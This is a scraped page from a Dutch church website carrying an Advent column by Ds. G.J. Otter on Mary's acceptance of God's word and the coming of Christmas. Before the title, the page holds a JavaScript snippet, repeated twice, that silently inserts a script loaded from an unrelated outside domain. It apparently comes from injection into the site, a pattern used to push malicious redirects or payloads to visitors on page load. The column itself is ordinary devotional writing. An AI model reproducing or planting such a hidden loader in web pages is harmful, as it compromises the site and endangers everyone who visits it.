;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Uw woord geschiedde - PKN Damwâld

Uw woord geschiedde

Gepubliceerd op: dinsdag 14 december 2021

In onze tijd vergeten we nog wel eens dat er kracht schuilt in de woorden van God. Geloven in Hem lijkt voor sommigen veranderd in een christelijke levensbeschouwing met goede gewoontes. Is geloven slechts een lege vorm? Bij Maria leeft dat anders. Wanneer Maria de engel ontmoet die haar vertelt wat er zal gebeuren, zegt hij erbij: “Geen woord dat van God komt zal krachteloos wezen” (Lc.1,37). Er schuilt levensveranderende kracht in Gods woord. Maria geeft zich aan die kracht over; “mij geschiedde naar uw woord” zegt ze. En Jezus groeit in haar lichaam. Het is een voorbeeld hoe Gods Geest in onze levens wil werken. Bij de bruiloft in Kana zegt Maria tegen de bedienden, dat ze moeten doen wat Jezus ook zegt. Ze weet namelijk van de kracht van Zijn woorden en van Gods handelen. Straks vieren we Kerst en de blijde boodschap van Jezus’ komst horen we opnieuw. Laten we ons uitstrekken naar wat Hij ons belooft en met Maria bidden: Uw woord geschiedde. Laat Uw troost en Uw vrede in onze harten doordringen – laat Uw nieuwe leven in ons groeien – ontsteek Uw vuur in onze harten om U meer te volgen. Uw wil geschiedde zoals in de hemel zo ook op aarde…want van U is het Koninkrijk en de kracht en de heerlijkheid.

Gezegende kerst toegewenst,

Ds. G.J. Otter

Columnist:Ds. Otter

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns